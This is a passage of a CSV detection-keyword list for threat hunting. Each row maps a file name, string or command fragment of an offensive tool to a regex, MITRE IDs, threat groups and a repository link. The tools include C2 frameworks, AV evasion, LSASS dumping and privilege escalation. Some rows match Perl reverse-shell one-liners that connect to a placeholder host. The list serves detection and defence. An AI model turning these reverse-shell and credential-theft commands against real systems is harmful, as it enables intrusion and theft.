security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","54607" "*pe_packer/dll_main.c*",".{0,1000}pe_packer\/dll_main\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","54608" "*pe_packer/exe_main.c*",".{0,1000}pe_packer\/exe_main\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","54609" "*pe_packer/main.c*",".{0,1000}pe_packer\/main\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","54610" 
"*pe_packer\dll_main.c*",".{0,1000}pe_packer\\dll_main\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","54611" "*pe_packer\exe_main.c*",".{0,1000}pe_packer\\exe_main\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","54612" "*pe_packer\main.c*",".{0,1000}pe_packer\\main\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","54613" "*pe_packer_exe.exe*",".{0,1000}pe_packer_exe\.exe.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","54614" "*pe2sh.exe*",".{0,1000}pe2sh\.exe.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","54615" "*pe2shc.exe *",".{0,1000}pe2shc\.exe\s.{0,1000}","offensive_tool_keyword","pe_to_shellcode","Converts PE into a shellcode","T1027 - T1059.004 - T1105 - T1036","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hasherezade/pe_to_shellcode","1","0","N/A","N/A","N/A","10","2521","452","2023-08-15T14:42:12Z","2018-08-19T22:57:07Z","54616" "*pe2shc.exe*",".{0,1000}pe2shc\.exe.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","54617" "*pe2shc_*.zip*",".{0,1000}pe2shc_.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","54618" "*Pe2Shellcode.py*",".{0,1000}Pe2Shellcode\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","54619" "*Peaky-XD/webshell*",".{0,1000}Peaky\-XD\/webshell.{0,1000}","offensive_tool_keyword","webshell","A collection of webshell","T1505.003 - T1100 - T1190 - T1505.004","TA0003 - TA0011 ","N/A","N/A","Persistence","https://github.com/Peaky-XD/webshell","1","1","N/A","N/A","10","","N/A","","","","54620" "*PEASS-ng-master*",".{0,1000}PEASS\-ng\-master.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","54621" "*PEASS-ng-master.zip*",".{0,1000}PEASS\-ng\-master\.zip.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","1","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","54622" "*peCloak*",".{0,1000}peCloak.{0,1000}","offensive_tool_keyword","peCloak","peCloak.py (beta) - A Multi-Pass Encoder & Heuristic 
Sandbox Bypass AV Evasion Tool","T1027.002 - T1059.003 - T1140 - T1562.001","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/v-p-b/peCloakCapstone/blob/master/peCloak.py","1","0","N/A","N/A","N/A","2","104","36","2016-03-21T23:38:15Z","2015-08-19T14:46:50Z","54623" "*PeekNamedPipe(fromPipe*",".{0,1000}PeekNamedPipe\(fromPipe.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","54624" "*peiga/DumpThatLSASS*",".{0,1000}peiga\/DumpThatLSASS.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","1","N/A","N/A","10","1","31","79","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z","54625" "*peinject.rb*",".{0,1000}peinject\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","54626" "*peinjector.rb*",".{0,1000}peinjector\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","54627" "*PELoader/PeLoader.*",".{0,1000}PELoader\/PeLoader\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","54628" "*pem2john.py*",".{0,1000}pem2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","54629" "*Pennyw0rth/NetExec*",".{0,1000}Pennyw0rth\/NetExec.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","54630" "*-pentest*",".{0,1000}\-pentest.{0,1000}","offensive_tool_keyword","_","pentest keyword detection. 
detect potential pentesters using this keyword in file name. repository or command line","N/A","N/A","N/A","N/A","Exploitation tool","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","54631" "*pentest\\sam.hive*",".{0,1000}pentest\\\\sam\.hive.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","54632" "*pentest\\system.hive*",".{0,1000}pentest\\\\system\.hive.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","54633" "*PentestBox*",".{0,1000}PentestBox.{0,1000}","offensive_tool_keyword","pentestbox","PentestBox is an Opensource PreConfigured Portable Penetration Testing Environment for the Windows Operating System","T1043 - T1059 - T1078 - T1082 - T1083 - T1092 - T1095 - T1102 - T1123 - T1132 - T1134 - T1135 - T1140 - T1204 - T1218 - T1219 - T1222 - T1247 - T1496 - T1497 - T1543 - T1552 - T1553 - T1574 - T1583 - T1588 - T1592 - T1596 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://pentestbox.org/fr/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","54634" "*PENTESTING-BIBLE*",".{0,1000}PENTESTING\-BIBLE.{0,1000}","offensive_tool_keyword","PENTESTING-BIBLE","pentest documentation - Explore more than 2000 hacking articles saved over time as PDF. 
BROWSE HISTORY.","T1583 - T1598 - T1596","TA0001 - TA0008 - TA0043","N/A","N/A","Exploitation tool","https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE","1","1","N/A","N/A","N/A","10","13135","2382","2023-04-03T07:40:28Z","2019-06-28T11:26:57Z","54635" "*pentest-machine*",".{0,1000}pentest\-machine.{0,1000}","offensive_tool_keyword","pentest-machine","Automates some pentesting work via an nmap XML file. As soon as each command finishes it writes its output to the terminal and the files in output-by-service/ and output-by-host/. Runs fast-returning commands first. Please send me protocols/commands/options that you would like to see included.","T1583 - T1584 - T1580 - T1582 - T1574","TA0002 - TA0001 - TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tool","https://github.com/DanMcInerney/pentest-machine","1","1","N/A","N/A","N/A","4","323","98","2018-09-07T20:01:41Z","2015-02-26T23:57:21Z","54636" "*pentestmonkey/php-reverse-shell*",".{0,1000}pentestmonkey\/php\-reverse\-shell.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","54637" "*pentestmonkey/pysecdump*",".{0,1000}pentestmonkey\/pysecdump.{0,1000}","offensive_tool_keyword","pysecdump","Python-based tool to dump security information from Windows systems","T1003.001 - T1081 - T1012 - T1005 - T1518.001","TA0006 - TA0007 - TA0043","N/A","Dispossessor","Credential Access","https://github.com/pentestmonkey/pysecdump","1","1","N/A","N/A","10","3","270","49","2020-06-22T04:16:16Z","2013-01-19T18:02:26Z","54638" "*pentestmonkey@pentestmonkey.net*",".{0,1000}pentestmonkey\@pentestmonkey\.net.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- 
TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#email","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","54639" "*pentest-script-master.zip*",".{0,1000}pentest\-script\-master\.zip.{0,1000}","offensive_tool_keyword","revbshell","ReVBShell - Reverse VBS Shell","T1059.005 - T1573.001 - T1105","TA0011 - TA0010","N/A","N/A","C2","https://github.com/bitsadmin/revbshell","1","1","N/A","N/A","10","10","81","27","2019-10-08T12:00:05Z","2017-02-19T18:58:52Z","54640" "*PE-Obfuscator.exe*",".{0,1000}PE\-Obfuscator\.exe.{0,1000}","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","1","N/A","N/A","N/A","3","213","40","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z","54641" "*PE-Obfuscator.git*",".{0,1000}PE\-Obfuscator\.git.{0,1000}","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","1","N/A","N/A","N/A","3","213","40","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z","54642" "*PE-Obfuscator-main*",".{0,1000}PE\-Obfuscator\-main.{0,1000}","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","1","N/A","N/A","N/A","3","213","40","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z","54643" "*Pepitoh/VBad*",".{0,1000}Pepitoh\/VBad.{0,1000}","offensive_tool_keyword","vbad","VBad is fully customizable VBA Obfuscation Tool combined with an MS Office document generator. 
It aims to help Red & Blue team for attack or defense.","T1564 - T1117 - T1204 - T1070","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Pepitoh/Vbad","1","1","N/A","N/A","8","6","544","127","2017-10-15T12:56:18Z","2016-03-09T12:36:04Z","54644" "*peration/registry/getallvaluesregistry*",".{0,1000}peration\/registry\/getallvaluesregistry.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","54645" "*perfdata.portswigger.net*",".{0,1000}perfdata\.portswigger\.net.{0,1000}","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://portswigger.net/burp","1","1","N/A","network exploitation tool","N/A","N/A","N/A","N/A","N/A","N/A","54646" "*PerfExec.sln*",".{0,1000}PerfExec\.sln.{0,1000}","offensive_tool_keyword","PerfExec","PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.","T1055.001 - T1059.001 - T1059.003 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/PerfExec","1","0","N/A","N/A","7","1","77","12","2023-08-02T20:53:24Z","2023-07-11T16:43:47Z","54647" "*PerfExec-main.zip*",".{0,1000}PerfExec\-main\.zip.{0,1000}","offensive_tool_keyword","PerfExec","PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather 
performance data locally or remotely.","T1055.001 - T1059.001 - T1059.003 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/PerfExec","1","0","N/A","N/A","7","1","77","12","2023-08-02T20:53:24Z","2023-07-11T16:43:47Z","54648" "*Perform AS-REP roasting*",".{0,1000}Perform\sAS\-REP\sroasting.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","54649" "*Perform full attack chain. Options are identical to RELAY. Tool must be on disk*",".{0,1000}Perform\sfull\sattack\schain\.\sOptions\sare\sidentical\sto\sRELAY\.\sTool\smust\sbe\son\sdisk.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Black Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","54650" "*Perform password spraying for all active users on a domain*",".{0,1000}Perform\spassword\sspraying\sfor\sall\sactive\susers\son\sa\sdomain.{0,1000}","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","0","N/A","N/A","10","1","90","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z","54651" "*perform_privilege_escalation_checks(*",".{0,1000}perform_privilege_escalation_checks\(.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","54652" "*Performing attack with current NTLM settings on current user*",".{0,1000}Performing\sattack\swith\scurrent\sNTLM\ssettings\son\scurrent\suser.{0,1000}","offensive_tool_keyword","SharpLocker","get current user credentials by popping a fake Windows lock screen","T1056.002 - 
T1204.002 - T1071.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Pickfordmatt/SharpLocker","1","0","#content","N/A","10","7","616","145","2020-05-27T22:56:34Z","2019-05-31T11:16:38Z","54653" "*Performing recursive ShadowSpray attack*",".{0,1000}Performing\srecursive\sShadowSpray\sattack.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","Black Basta","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","N/A","7","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","54654" "*Performs a kerberoasting attack against targeted*",".{0,1000}Performs\sa\skerberoasting\sattack\sagainst\stargeted.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","54655" "*Perfusion.exe -c*",".{0,1000}Perfusion\.exe\s\-c.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2008R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","N/A","N/A","10","5","419","75","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z","54656" "*Perfusion\RegistryPatch.ps1*",".{0,1000}Perfusion\\RegistryPatch\.ps1.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2008R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - 
TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","N/A","N/A","10","5","419","75","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z","54657" "*Perfusion-master.zip*",".{0,1000}Perfusion\-master\.zip.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2008R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","1","N/A","N/A","10","5","419","75","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z","54658" "*PeriscopeCLI.SelectedHost.HostData.RegistryEntries*",".{0,1000}PeriscopeCLI\.SelectedHost\.HostData\.RegistryEntries.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","0","#content","N/A","9","","N/A","","","","54659" "*perl adcsv.pl *",".{0,1000}perl\sadcsv\.pl\s.{0,1000}","offensive_tool_keyword","cobaltstrike","cobaltstrike plugin (This reads an ADFIND dump and CSVs it) used by Dispossessor ransomware group","T1486 - T1490 - T1059 - T1213 - T1078","TA0040 - TA0043 - TA0001 - TA0009","N/A","Dispossessor","Discovery","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","54660" "*perl -e 'use Socket;$*;socket(S,PF_INET,SOCK_STREAM,getprotobyname*",".{0,1000}perl\s\-e\s\'use\sSocket\;\$.{0,1000}\;socket\(S,PF_INET,SOCK_STREAM,getprotobyname.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- 
TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","54661" "*perl -e 'use Socket;$i=""${lhost}"";$p=${port}*",".{0,1000}perl\s\-e\s\'use\sSocket\;\$i\=\""\$\{lhost\}\""\;\$p\=\$\{port\}.{0,1000}","offensive_tool_keyword","Weevely3","Weevely is a web shell designed for post-exploitation purposes that can be extended over the network at runtime","T1059.003 - T1100 - T1071.001 - T1219 - T1078","TA0002 - TA0003 - TA0005 - TA0011 - TA0008","N/A","Sandworm","Resource Development","https://github.com/epinna/weevely3","1","0","N/A","N/A","8","10","3292","612","2024-10-18T04:32:13Z","2014-09-20T10:16:49Z","54662" "*perl -MIO -e *new IO::Socket::INET(PeerAddr,""*:*"");STDIN->fdopen(*",".{0,1000}perl\s\-MIO\s\-e\s.{0,1000}new\sIO\:\:Socket\:\:INET\(PeerAddr,\"".{0,1000}\:.{0,1000}\""\)\;STDIN\-\>fdopen\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","54663" "*perl nikto.pl 